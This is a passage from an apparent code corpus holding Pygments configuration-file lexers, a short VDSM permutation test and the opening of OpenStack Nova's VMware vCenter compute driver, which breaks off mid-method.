(r'[a-zA-Z._-]+', Keyword),
(r'\d+\.\d+\.\d+\.\d+(?:/\d+)?', Number),
(r'[0-9]+', Number),
(r'=>|=~|\+=|==|=|\+', Operator),
(r'\$[A-Z]+', Name.Builtin),
(r'[(){}\[\],]', Punctuation),
(r'"([^"\\]*(?:\\.[^"\\]*)*)"', String.Double),
(r'\s+', Text),
],
}
class DockerLexer(RegexLexer):
"""
Lexer for `Docker <http://docker.io>`_ configuration files.
.. versionadded:: 2.0
"""
name = 'Docker'
aliases = ['docker', 'dockerfile']
filenames = ['Dockerfile', '*.docker']
mimetypes = ['text/x-dockerfile-config']
_keywords = (r'(?:MAINTAINER|EXPOSE|WORKDIR|USER|STOPSIGNAL)')
_bash_keywords = (r'(?:RUN|CMD|ENTRYPOINT|ENV|ARG|LABEL|ADD|COPY)')
_lb = r'(?:\s*\\?\s*)' # dockerfile line break regex
flags = re.IGNORECASE | re.MULTILINE
tokens = {
'root': [
(r'#.*', Comment),
(r'(FROM)([ \t]*)(\S*)([ \t]*)(?:(AS)([ \t]*)(\S*))?',
bygroups(Keyword, Text, String, Text, Keyword, Text, String)),
(r'(ONBUILD)(%s)' % (_lb,), bygroups(Keyword, using(BashLexer))),
(r'(HEALTHCHECK)((%s--\w+=\w+%s)*)' % (_lb, _lb),
bygroups(Keyword, using(BashLexer))),
(r'(VOLUME|ENTRYPOINT|CMD|SHELL)(%s)(\[.*?\])' % (_lb,),
bygroups(Keyword, using(BashLexer), using(JsonLexer))),
(r'(LABEL|ENV|ARG)((%s\w+=\w+%s)*)' % (_lb, _lb),
bygroups(Keyword, using(BashLexer))),
(r'(%s|VOLUME)\b(.*)' % (_keywords), bygroups(Keyword, String)),
(r'(%s)' % (_bash_keywords,), Keyword),
(r'(.*\\\n)*.+', using(BashLexer)),
]
}
class TerraformLexer(RegexLexer):
"""
    Lexer for `terraform .tf files <https://www.terraform.io/>`_.
.. versionadded:: 2.1
"""
name = 'Terraform'
aliases = ['terraform', 'tf']
filenames = ['*.tf']
mimetypes = ['application/x-tf', 'application/x-terraform']
classes = ('backend', 'data', 'module', 'output', 'provider',
'provisioner', 'resource', 'variable')
classes_re = "({})".format(('|').join(classes))
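    # e.g. classes_re ==
    #   '(backend|data|module|output|provider|provisioner|resource|variable)'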
types = ('string', 'number', 'bool', 'list', 'tuple', 'map', 'object', 'null')
numeric_functions = ('abs', 'ceil', 'floor', 'log', 'max',
'mix', 'parseint', 'pow', 'signum')
string_functions = ('chomp', 'format', 'formatlist', 'indent',
'join', 'lower', 'regex', 'regexall', 'replace',
'split', 'strrev', 'substr', 'title', 'trim',
'trimprefix', 'trimsuffix', 'trimspace', 'upper'
)
collection_functions = ('alltrue', 'anytrue', 'chunklist', 'coalesce',
'coalescelist', 'compact', 'concat', 'contains',
'distinct', 'element', 'flatten', 'index', 'keys',
'length', 'list', 'lookup', 'map', 'matchkeys',
'merge', 'range', 'reverse', 'setintersection',
'setproduct', 'setsubtract', 'setunion', 'slice',
'sort', 'sum', 'transpose', 'values', 'zipmap'
)
encoding_functions = ('base64decode', 'base64encode', 'base64gzip',
'csvdecode', 'jsondecode', 'jsonencode', 'textdecodebase64',
'textencodebase64', 'urlencode', 'yamldecode', 'yamlencode')
filesystem_functions = ('abspath', 'dirname', 'pathexpand', 'basename',
'file', 'fileexists', 'fileset', 'filebase64', 'templatefile')
date_time_functions = ('formatdate', 'timeadd', 'timestamp')
hash_crypto_functions = ('base64sha256', 'base64sha512', 'bcrypt', 'filebase64sha256',
'filebase64sha512', 'filemd5', 'filesha1', 'filesha256', 'filesha512',
'md5', 'rsadecrypt', 'sha1', 'sha256', 'sha512', 'uuid', 'uuidv5')
ip_network_functions = ('cidrhost', 'cidrnetmask', 'cidrsubnet', 'cidrsubnets')
type_conversion_functions = ('can', 'defaults', 'tobool', 'tolist', 'tomap',
'tonumber', 'toset', 'tostring', 'try')
builtins = numeric_functions + string_functions + collection_functions + encoding_functions +\
filesystem_functions + date_time_functions + hash_crypto_functions + ip_network_functions +\
type_conversion_functions
builtins_re = "({})".format(('|').join(builtins))
tokens = {
'root': [
include('basic'),
include('whitespace'),
# Strings
(r'(".*")', bygroups(String.Double)),
# Constants
(words(('true', 'false'), prefix=r'\b', suffix=r'\b'), Name.Constant),
# Types
(words(types, prefix=r'\b', suffix=r'\b'), Keyword.Type),
include('identifier'),
include('punctuation'),
(r'[0-9]+', Number),
],
'basic': [
(r'\s*/\*', Comment.Multiline, 'comment'),
(r'\s*#.*\n', Comment.Single),
include('whitespace'),
# e.g. terraform {
# e.g. egress {
(r'(\s*)([0-9a-zA-Z-_]+)(\s*)(=?)(\s*)(\{)',
bygroups(Text, Name.Builtin, Text, Operator, Text, Punctuation)),
# Assignment with attributes, e.g. something = ...
(r'(\s*)([0-9a-zA-Z-_]+)(\s*)(=)(\s*)',
bygroups(Text, Name.Attribute, Text, Operator, Text)),
# Assignment with environment variables and similar, e.g. "something" = ...
# or key value assignment, e.g. "SlotName" : ...
(r'(\s*)("\S+")(\s*)([=:])(\s*)',
bygroups(Text, Literal.String.Double, Text, Operator, Text)),
# Functions, e.g. jsonencode(element("value"))
(builtins_re + r'(\()', bygroups(Name.Function, Punctuation)),
# List of attributes, e.g. ignore_changes = [last_modified, filename]
(r'(\[)([a-z_,\s]+)(\])', bygroups(Punctuation, Name.Builtin, Punctuation)),
# e.g. resource "aws_security_group" "allow_tls" {
# e.g. backend "consul" {
(classes_re + r'(\s+)', bygroups(Keyword.Reserved, Text), 'blockname'),
],
'blockname': [
# e.g. resource "aws_security_group" "allow_tls" {
# e.g. backend "consul" {
(r'(\s*)("[0-9a-zA-Z-_]+")?(\s*)("[0-9a-zA-Z-_]+")(\s+)(\{)',
bygroups(Text, Name.Class, Text, Name.Variable, Text, Punctuation)),
],
'identifier': [
(r'\b(var\.[0-9a-zA-Z-_\.\[\]]+)\b', bygroups(Name.Variable)),
(r'\b([0-9a-zA-Z-_\[\]]+\.[0-9a-zA-Z-_\.\[\]]+)\b', bygroups(Name.Variable)),
],
'punctuation': [
(r'[\[\]()\{\},.?:!=]', Punctuation),
],
'comment': [
(r'[^*/]', Comment.Multiline),
(r'/\*', Comment.Multiline, '#push'),
(r'\*/', Comment.Multiline, '#pop'),
(r'[*/]', Comment.Multiline)
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text),
],
}
class TermcapLexer(RegexLexer):
"""
Lexer for termcap database source.
This is very simple and minimal.
.. versionadded:: 2.1
"""
name = 'Termcap'
aliases = ['termcap']
filenames = ['termcap', 'termcap.src']
mimetypes = []
# NOTE:
# * multiline with trailing backslash
# * separator is ':'
# * to embed colon as data, we must use \072
    # * space after separator is not allowed (maybe)
tokens = {
'root': [
(r'^#.*$', Comment),
(r'^[^\s#:|]+', Name.Tag, 'names'),
],
'names': [
(r'\n', Text, '#pop'),
(r':', Punctuation, 'defs'),
(r'\|', Punctuation),
(r'[^:|]+', Name.Attribute),
],
'defs': [
(r'\\\n[ \t]*', Text),
(r'\n[ \t]*', Text, '#pop:2'),
(r'(#)([0-9]+)', bygroups(Operator, Number)),
(r'=', Operator, 'data'),
(r':', Punctuation),
(r'[^\s:=#]+', Name.Class),
],
'data': [
(r'\\072', Literal),
(r':', Punctuation, '#pop'),
(r'[^:\\]+', Literal), # for performance
(r'.', Literal),
],
}
class TerminfoLexer(RegexLexer):
"""
Lexer for terminfo database source.
This is very simple and minimal.
.. versionadded:: 2.1
"""
name = 'Terminfo'
aliases = ['terminfo']
filenames = ['terminfo', 'terminfo.src']
mimetypes = []
# NOTE:
# * multiline with leading whitespace
# * separator is ','
# * to embed comma as data, we can use \,
# * space after separator is allowed
tokens = {
'root': [
(r'^#.*$', Comment),
(r'^[^\s#,|]+', Name.Tag, 'names'),
],
'names': [
(r'\n', Text, '#pop'),
(r'(,)([ \t]*)', bygroups(Punctuation, Text), 'defs'),
(r'\|', Punctuation),
(r'[^,|]+', Name.Attribute),
],
'defs': [
(r'\n[ \t]+', Text),
(r'\n', Text, '#pop:2'),
(r'(#)([0-9]+)', bygroups(Operator, Number)),
(r'=', Operator, 'data'),
(r'(,)([ \t]*)', bygroups(Punctuation, Text)),
(r'[^\s,=#]+', Name.Class),
],
'data': [
(r'\\[,\\]', Literal),
(r'(,)([ \t]*)', bygroups(Punctuation, Text), '#pop'),
(r'[^\\,]+', Literal), # for performance
(r'.', Literal),
],
}
class PkgConfigLexer(RegexLexer):
"""
Lexer for `pkg-config
<http://www.freedesktop.org/wiki/Software/pkg-config/>`_
(see also `manual page <http://linux.die.net/man/1/pkg-config>`_).
.. versionadded:: 2.1
"""
name = 'PkgConfig'
aliases = ['pkgconfig']
filenames = ['*.pc']
mimetypes = []
tokens = {
'root': [
(r'#.*$', Comment.Single),
# variable definitions
(r'^(\w+)(=)', bygroups(Name.Attribute, Operator)),
# keyword lines
(r'^([\w.]+)(:)',
bygroups(Name.Tag, Punctuation), 'spvalue'),
# variable references
include('interp'),
# fallback
(r'[^${}#=:\n.]+', Text),
(r'.', Text),
],
'interp': [
# you can escape literal "$" as "$$"
(r'\$\$', Text),
# variable references
(r'\$\{', String.Interpol, 'curly'),
],
'curly': [
(r'\}', String.Interpol, '#pop'),
(r'\w+', Name.Attribute),
],
'spvalue': [
include('interp'),
(r'#.*$', Comment.Single, '#pop'),
(r'\n', Text, '#pop'),
# fallback
(r'[^${}#\n]+', Text),
(r'.', Text),
],
}
class PacmanConfLexer(RegexLexer):
"""
Lexer for `pacman.conf
<https://www.archlinux.org/pacman/pacman.conf.5.html>`_.
    Actually, IniLexer works almost fine for this format,
    but it yields error tokens, because pacman.conf has
    a form without assignment like:
UseSyslog
Color
TotalDownload
CheckSpace
VerbosePkgLists
These are flags to switch on.
.. versionadded:: 2.1
"""
name = 'PacmanConf'
aliases = ['pacmanconf']
filenames = ['pacman.conf']
mimetypes = []
tokens = {
'root': [
# comment
(r'#.*$', Comment.Single),
# section header
(r'^\s*\[.*?\]\s*$', Keyword),
# variable definitions
# (Leading space is allowed...)
(r'(\w+)(\s*)(=)',
bygroups(Name.Attribute, Text, Operator)),
# flags to on
(r'^(\s*)(\w+)(\s*)$',
bygroups(Text, Name.Attribute, Text)),
# built-in special values
(words((
'$repo', # repository
'$arch', # architecture
'%o', # outfile
'%u', # url
), suffix=r'\b'),
Name.Variable),
# fallback
(r'.', Text),
],
}
class AugeasLexer(RegexLexer):
"""
Lexer for `Augeas <http://augeas.net>`_.
.. versionadded:: 2.4
"""
name = 'Augeas'
aliases = ['augeas']
filenames = ['*.aug']
tokens = {
'root': [
(r'(module)(\s*)([^\s=]+)', bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(let)(\s*)([^\s=]+)', bygroups(Keyword.Declaration, Text, Name.Variable)),
(r'(del|store|value|counter|seq|key|label|autoload|incl|excl|transform|test|get|put)(\s+)', bygroups(Name.Builtin, Text)),
(r'(\()([^:]+)(\:)(unit|string|regexp|lens|tree|filter)(\))', bygroups(Punctuation, Name.Variable, Punctuation, Keyword.Type, Punctuation)),
(r'\(\*', Comment.Multiline, 'comment'),
(r'[*+\-.;=?|]', Operator),
(r'[()\[\]{}]', Operator),
(r'"', String.Double, 'string'),
(r'\/', String.Regex, 'regex'),
(r'([A-Z]\w*)(\.)(\w+)', bygroups(Name.Namespace, Punctuation, Name.Variable)),
(r'.', Name.Variable),
(r'\s', Text),
],
'string': [
(r'\\.', String.Escape),
(r'[^"]', String.Double),
(r'"', String.Double, '#pop'),
],
'regex': [
(r'\\.', String.Escape),
(r'[^/]', String.Regex),
(r'\/', String.Regex, '#pop'),
],
'comment': [
(r'[^*)]', Comment.Multiline),
(r'\(\*', Comment.Multiline, '#push'),
(r'\*\)', Comment.Multiline, '#pop'),
(r'[)*]', Comment.Multiline)
],
}
class TOMLLexer(RegexLexer):
"""
Lexer for `TOML <https://github.com/toml-lang/toml>`_, a simple language
for config files.
.. versionadded:: 2.4
"""
name = 'TOML'
aliases = ['toml']
filenames = ['*.toml', 'Pipfile', 'poetry.lock']
tokens = {
'root': [
# Table
(r'^(\s*)(\[.*?\])$', bygroups(Text, Keyword)),
# Basics, comments, strings
(r'[ \t]+', Text),
(r'\n', Text),
(r'#.*?$', Comment.Single),
# Basic string
(r'"(\\\\|\\[^\\]|[^"\\])*"', String),
# Literal string
(r'\'\'\'(.*)\'\'\'', String),
(r'\'[^\']*\'', String),
(r'(true|false)$', Keyword.Constant),
(r'[a-zA-Z_][\w\-]*', Name),
# Datetime
# TODO this needs to be expanded, as TOML is rather flexible:
# https://github.com/toml-lang/toml#offset-date-time
(r'\d{4}-\d{2}-\d{2}(?:T| )\d{2}:\d{2}:\d{2}(?:Z|[-+]\d{2}:\d{2})', Number.Integer),
# Numbers
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
# Handle +-inf, +-infinity, +-nan
(r'[+-]?(?:(inf(?:inity)?)|nan)', Number.Float),
(r'[+-]?\d+', Number.Integer),
# Punctuation
(r'[]{}:(),;[]', Punctuation),
(r'\.', Punctuation),
# Operators
(r'=', Operator)
]
}
class NestedTextLexer(RegexLexer):
"""
    Lexer for `NestedText <https://nestedtext.org>`_, a human-friendly data
format.
.. versionadded:: 2.9
"""
name = 'NestedText'
aliases = ['nestedtext', 'nt']
filenames = ['*.nt']
_quoted_dict_item = r'^(\s*)({0})(.*?)({0}: ?)(.*?)(\s*)$'
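    # e.g. _quoted_dict_item.format("'") expands to the pattern:
    #   ^(\s*)(')(.*?)(': ?)(.*?)(\s*)$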
tokens = {
'root': [
(r'^(\s*)(#.*?)$', bygroups(Text, Comment)),
(r'^(\s*)(> ?)(.*?)(\s*)$', bygroups(Text, Punctuation, String, Whitespace)),
(r'^(\s*)(- ?)(.*?)(\s*)$', bygroups(Text, Punctuation, String, Whitespace)),
(_quoted_dict_item.format("'"), bygroups(Text, Punctuation, Name, Punctuation, String, Whitespace)),
(_quoted_dict_item.format('"'), bygroups(Text, Punctuation, Name, Punctuation, String, Whitespace)),
(r'^(\s*)(.*?)(: ?)(.*?)(\s*)$', bygroups(Text, Name, Punctuation, String, Whitespace)),
],
}
class SingularityLexer(RegexLexer):
"""
Lexer for `Singularity definition files
<https://www.sylabs.io/guides/3.0/user-guide/definition_files.html>`_.
.. versionadded:: 2.6
"""
name = 'Singularity'
aliases = ['singularity']
filenames = ['*.def', 'Singularity']
flags = re.IGNORECASE | re.MULTILINE | re.DOTALL
_headers = r'^(\s*)(bootstrap|from|osversion|mirrorurl|include|registry|namespace|includecmd)(:)'
_section = r'^%(?:pre|post|setup|environment|help|labels|test|runscript|files|startscript)\b'
_appsect = r'^%app(?:install|help|run|labels|env|test|files)\b'
tokens = {
'root': [
(_section, Generic.Heading, 'script'),
(_appsect, Generic.Heading, 'script'),
(_headers, bygroups(Text, Keyword, Text)),
(r'\s*#.*?\n', Comment),
(r'\b(([0-9]+\.?[0-9]*)|(\.[0-9]+))\b', Number),
(r'(?!^\s*%).', Text),
],
'script': [
(r'(.+?(?=^\s*%))|(.*)', using(BashLexer), '#pop'),
],
}
def analyse_text(text):
"""This is a quite simple script file, but there are a few keywords
which seem unique to this language."""
result = 0
if re.search(r'\b(?:osversion|includecmd|mirrorurl)\b', text, re.IGNORECASE):
result += 0.5
if re.search(SingularityLexer._section[1:], text):
result += 0.49
return result
|
sonntagsgesicht/regtest
|
.aux/venv/lib/python3.9/site-packages/pygments/lexers/configs.py
|
Python
|
apache-2.0
| 37,927
|
#
# Copyright 2012 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
This isn't really integral to the way VDSM works; it is just an example of
how to do permutations.
"""
from testlib import permutations, expandPermutations
from testlib import VdsmTestCase as TestCaseBase
def recSum(lst):
if not lst:
return 0
return lst[0] + recSum(lst[1:])
def mysum(lst, strategy):
if strategy == "recursive":
return recSum(lst)
if strategy == "builtin":
return sum(lst)
if strategy == "loop":
s = 0
for i in lst:
s += i
return s
SUM_PERMUTATIONS = (("recursive",),
                    ("builtin",),
                    ("loop",))
@expandPermutations
class SumTests(TestCaseBase):
    @permutations(SUM_PERMUTATIONS)
def test(self, strategy):
        self.assertEqual(mysum((1, 2, 3), strategy), 6)
|
kvaps/vdsm
|
tests/permutationTests.py
|
Python
|
gpl-2.0
| 1,636
|
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware vCenter platform.
"""
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_vmware import api
from oslo_vmware import exceptions as vexc
from oslo_vmware import pbm
from oslo_vmware import vim
from oslo_vmware import vim_util
from nova import exception
from nova.i18n import _, _LI, _LW
from nova.virt import driver
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import host
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import vmops
from nova.virt.vmwareapi import volumeops
LOG = logging.getLogger(__name__)
vmwareapi_opts = [
cfg.StrOpt('host_ip',
help='Hostname or IP address for connection to VMware VC '
'host.'),
cfg.IntOpt('host_port',
default=443,
help='Port for connection to VMware VC host.'),
cfg.StrOpt('host_username',
help='Username for connection to VMware VC host.'),
cfg.StrOpt('host_password',
help='Password for connection to VMware VC host.',
secret=True),
cfg.MultiStrOpt('cluster_name',
help='Name of a VMware Cluster ComputeResource.'),
cfg.StrOpt('datastore_regex',
help='Regex to match the name of a datastore.'),
cfg.FloatOpt('task_poll_interval',
default=0.5,
help='The interval used for polling of remote tasks.'),
cfg.IntOpt('api_retry_count',
default=10,
help='The number of times we retry on failures, e.g., '
'socket error, etc.'),
cfg.IntOpt('vnc_port',
default=5900,
help='VNC starting port'),
cfg.IntOpt('vnc_port_total',
default=10000,
help='Total number of VNC ports'),
cfg.BoolOpt('use_linked_clone',
default=True,
help='Whether to use linked clone'),
cfg.StrOpt('wsdl_location',
help='Optional VIM Service WSDL Location '
                    'e.g. http://<server>/vimService.wsdl. '
'Optional over-ride to default location for bug '
'work-arounds')
]
spbm_opts = [
cfg.BoolOpt('pbm_enabled',
default=False,
help='The PBM status.'),
cfg.StrOpt('pbm_wsdl_location',
help='PBM service WSDL file location URL. '
'e.g. file:///opt/SDK/spbm/wsdl/pbmService.wsdl '
'Not setting this will disable storage policy based '
'placement of instances.'),
cfg.StrOpt('pbm_default_policy',
help='The PBM default policy. If pbm_wsdl_location is set and '
'there is no defined storage policy for the specific '
'request then this policy will be used.'),
]
CONF = cfg.CONF
CONF.register_opts(vmwareapi_opts, 'vmware')
CONF.register_opts(spbm_opts, 'vmware')
TIME_BETWEEN_API_CALL_RETRIES = 1.0
class VMwareVCDriver(driver.ComputeDriver):
"""The VC host connection object."""
capabilities = {
"has_imagecache": True,
"supports_recreate": False,
}
# The vCenter driver includes API that acts on ESX hosts or groups
# of ESX hosts in clusters or non-cluster logical-groupings.
#
# vCenter is not a hypervisor itself, it works with multiple
# hypervisor host machines and their guests. This fact can
# subtly alter how vSphere and OpenStack interoperate.
def __init__(self, virtapi, scheme="https"):
super(VMwareVCDriver, self).__init__(virtapi)
if (CONF.vmware.host_ip is None or
CONF.vmware.host_username is None or
CONF.vmware.host_password is None):
raise Exception(_("Must specify host_ip, host_username and "
"host_password to use vmwareapi.VMwareVCDriver"))
self._datastore_regex = None
if CONF.vmware.datastore_regex:
try:
self._datastore_regex = re.compile(CONF.vmware.datastore_regex)
except re.error:
raise exception.InvalidInput(reason=
_("Invalid Regular Expression %s")
% CONF.vmware.datastore_regex)
self._session = VMwareAPISession(scheme=scheme)
# Update the PBM location if necessary
if CONF.vmware.pbm_enabled:
self._update_pbm_location()
self._validate_configuration()
# Get the list of clusters to be used
self._cluster_names = CONF.vmware.cluster_name
self.dict_mors = vm_util.get_all_cluster_refs_by_name(self._session,
self._cluster_names)
if not self.dict_mors:
raise exception.NotFound(_("All clusters specified %s were not"
" found in the vCenter")
% self._cluster_names)
# Check if there are any clusters that were specified in the nova.conf
# but are not in the vCenter, for missing clusters log a warning.
clusters_found = [v.get('name') for k, v in self.dict_mors.iteritems()]
missing_clusters = set(self._cluster_names) - set(clusters_found)
if missing_clusters:
LOG.warning(_LW("The following clusters could not be found in the "
"vCenter %s"), list(missing_clusters))
# The _resources is used to maintain the vmops, volumeops and vcstate
# objects per cluster
self._resources = {}
self._resource_keys = set()
self._virtapi = virtapi
self._update_resources()
# The following initialization is necessary since the base class does
# not use VC state.
first_cluster = self._resources.keys()[0]
self._vmops = self._resources.get(first_cluster).get('vmops')
self._volumeops = self._resources.get(first_cluster).get('volumeops')
self._vc_state = self._resources.get(first_cluster).get('vcstate')
# Register the OpenStack extension
self._register_openstack_extension()
@property
def need_legacy_block_device_info(self):
return False
def _update_pbm_location(self):
if CONF.vmware.pbm_wsdl_location:
pbm_wsdl_loc = CONF.vmware.pbm_wsdl_location
else:
version = vim_util.get_vc_version(self._session)
pbm_wsdl_loc = pbm.get_pbm_wsdl_location(version)
self._session.pbm_wsdl_loc_set(pbm_wsdl_loc)
def _validate_configuration(self):
if CONF.vmware.use_linked_clone is None:
raise vexc.UseLinkedCloneConfigurationFault()
if CONF.vmware.pbm_enabled:
if not CONF.vmware.pbm_default_policy:
raise error_util.PbmDefaultPolicyUnspecified()
if not pbm.get_profile_id_by_name(
self._session,
CONF.vmware.pbm_default_policy):
raise error_util.PbmDefaultPolicyDoesNotExist()
if CONF.vmware.datastore_regex:
LOG.warning(_LW(
"datastore_regex is ignored when PBM is enabled"))
self._datastore_regex = None
def init_host(self, host):
vim = self._session.vim
if vim is None:
self._session._create_session()
def cleanup_host(self, host):
self._session.logout()
def _register_openstack_extension(self):
# Register an 'OpenStack' extension in vCenter
LOG.debug('Registering extension %s with vCenter',
constants.EXTENSION_KEY)
os_extension = self._session._call_method(vim_util, 'find_extension',
constants.EXTENSION_KEY)
if os_extension is None:
LOG.debug('Extension does not exist. Registering type %s.',
constants.EXTENSION_TYPE_INSTANCE)
self._session._call_method(vim_util, 'register_extension',
constants.EXTENSION_KEY,
constants.EXTENSION_TYPE_INSTANCE)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
"""Cleanup after instance being destroyed by Hypervisor."""
pass
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
state = vm_util.get_vm_state(self._session, instance)
ignored_states = ['poweredon', 'suspended']
if state.lower() in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self.reboot(context, instance, network_info, 'hard',
block_device_info)
def list_instance_uuids(self):
"""List VM instance UUIDs."""
return self._vmops.list_instances()
def list_instances(self):
"""List VM instances from all nodes."""
instances = []
nodes = self.get_available_nodes()
for node in nodes:
vmops = self._get_vmops_for_compute_node(node)
instances.extend(vmops.list_instances())
return instances
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
"""Transfers the disk of a running instance in multiple phases, turning
off the instance before the end.
"""
# TODO(PhilDay): Add support for timeout (clean shutdown)
return self._vmops.migrate_disk_and_power_off(context, instance,
dest, flavor)
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._vmops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
"""Finish reverting a resize, powering back on the instance."""
self._vmops.finish_revert_migration(context, instance, network_info,
block_device_info, power_on)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
"""Completes a resize, turning on the migrated instance."""
self._vmops.finish_migration(context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info, power_on)
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Live migration of an instance to another host."""
self._vmops.live_migration(context, instance, dest,
post_method, recover_method,
block_migration)
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info)
def get_instance_disk_info(self, instance, block_device_info=None):
pass
def get_vnc_console(self, context, instance):
"""Return link to instance's VNC console using vCenter logic."""
# vCenter does not actually run the VNC service
# itself. You must talk to the VNC host underneath vCenter.
return self._vmops.get_vnc_console(instance)
def _update_resources(self):
"""This method creates a dictionary of VMOps, VolumeOps and VCState.
The VMwareVMOps, VMwareVolumeOps and VCState object is for each
cluster/rp. The dictionary is of the form
{
domain-1000 : {'vmops': vmops_obj,
'volumeops': volumeops_obj,
'vcstate': vcstate_obj,
'name': MyCluster},
resgroup-1000 : {'vmops': vmops_obj,
'volumeops': volumeops_obj,
'vcstate': vcstate_obj,
'name': MyRP},
}
"""
added_nodes = set(self.dict_mors.keys()) - set(self._resource_keys)
for node in added_nodes:
_volumeops = volumeops.VMwareVolumeOps(self._session,
self.dict_mors[node]['cluster_mor'])
_vmops = vmops.VMwareVMOps(self._session, self._virtapi,
_volumeops,
self.dict_mors[node]['cluster_mor'],
datastore_regex=self._datastore_regex)
name = self.dict_mors.get(node)['name']
nodename = self._create_nodename(node, name)
_vc_state = host.VCState(self._session, nodename,
self.dict_mors.get(node)['cluster_mor'],
self._datastore_regex)
self._resources[nodename] = {'vmops': _vmops,
'volumeops': _volumeops,
'vcstate': _vc_state,
'name': name,
}
self._resource_keys.add(node)
deleted_nodes = (set(self._resource_keys) -
set(self.dict_mors.keys()))
for node in deleted_nodes:
name = self.dict_mors.get(node)['name']
nodename = self._create_nodename(node, name)
del self._resources[nodename]
self._resource_keys.discard(node)
def _create_nodename(self, mo_id, display_name):
"""Creates the name that is stored in hypervisor_hostname column.
The name will be of the form similar to
domain-1000(MyCluster)
resgroup-1000(MyResourcePool)
"""
return mo_id + '(' + display_name + ')'
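    # Illustrative note (not part of the original driver): given the format
    # described above, _create_nodename('domain-1000', 'MyCluster') returns
    # 'domain-1000(MyCluster)', which is the nodename later looked up by
    # _get_resource_for_node() and reported as hypervisor_hostname.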
def _get_resource_for_node(self, nodename):
"""Gets the resource information for the specific node."""
resource = self._resources.get(nodename)
if not resource:
msg = _("The resource %s does not exist") % nodename
raise exception.NotFound(msg)
return resource
def _get_vmops_for_compute_node(self, nodename):
"""Retrieve vmops object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['vmops']
def _get_volumeops_for_compute_node(self, nodename):
"""Retrieve vmops object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['volumeops']
def _get_vc_state_for_compute_node(self, nodename):
"""Retrieve VCState object from mo_id stored in the node name.
Node name is of the form domain-1000(MyCluster)
"""
resource = self._get_resource_for_node(nodename)
return resource['vcstate']
def _get_available_resources(self, host_stats):
return {'vcpus': host_stats['vcpus'],
'memory_mb': host_stats['host_memory_total'],
'local_gb': host_stats['disk_total'],
'vcpus_used': 0,
'memory_mb_used': host_stats['host_memory_total'] -
host_stats['host_memory_free'],
'local_gb_used': host_stats['disk_used'],
'hypervisor_type': host_stats['hypervisor_type'],
'hypervisor_version': host_stats['hypervisor_version'],
'hypervisor_hostname': host_stats['hypervisor_hostname'],
                # The VMware driver manages multiple hosts, so there are
# likely many different CPU models in use. As such it is
# impossible to provide any meaningful info on the CPU
# model of the "host"
'cpu_info': None,
'supported_instances': jsonutils.dumps(
host_stats['supported_instances']),
'numa_topology': None,
}
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called when nova-compute launches, and
as part of a periodic task.
:returns: dictionary describing resources
"""
stats_dict = {}
vc_state = self._get_vc_state_for_compute_node(nodename)
if vc_state:
host_stats = vc_state.get_host_stats(refresh=True)
# Updating host information
stats_dict = self._get_available_resources(host_stats)
else:
LOG.info(_LI("Invalid cluster or resource pool"
" name : %s"), nodename)
return stats_dict
def get_available_nodes(self, refresh=False):
"""Returns nodenames of all nodes managed by the compute service.
This method is for multi compute-nodes support. If a driver supports
multi compute-nodes, this method returns a list of nodenames managed
by the service. Otherwise, this method should return
[hypervisor_hostname].
"""
self.dict_mors = vm_util.get_all_cluster_refs_by_name(
self._session,
CONF.vmware.cluster_name)
node_list = []
self._update_resources()
for node in self.dict_mors.keys():
nodename = self._create_nodename(node,
self.dict_mors.get(node)['name'])
node_list.append(nodename)
LOG.debug("The available nodes are: %s", node_list)
return node_list
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
flavor=None):
"""Create VM instance."""
_vmops = self._get_vmops_for_compute_node(instance['node'])
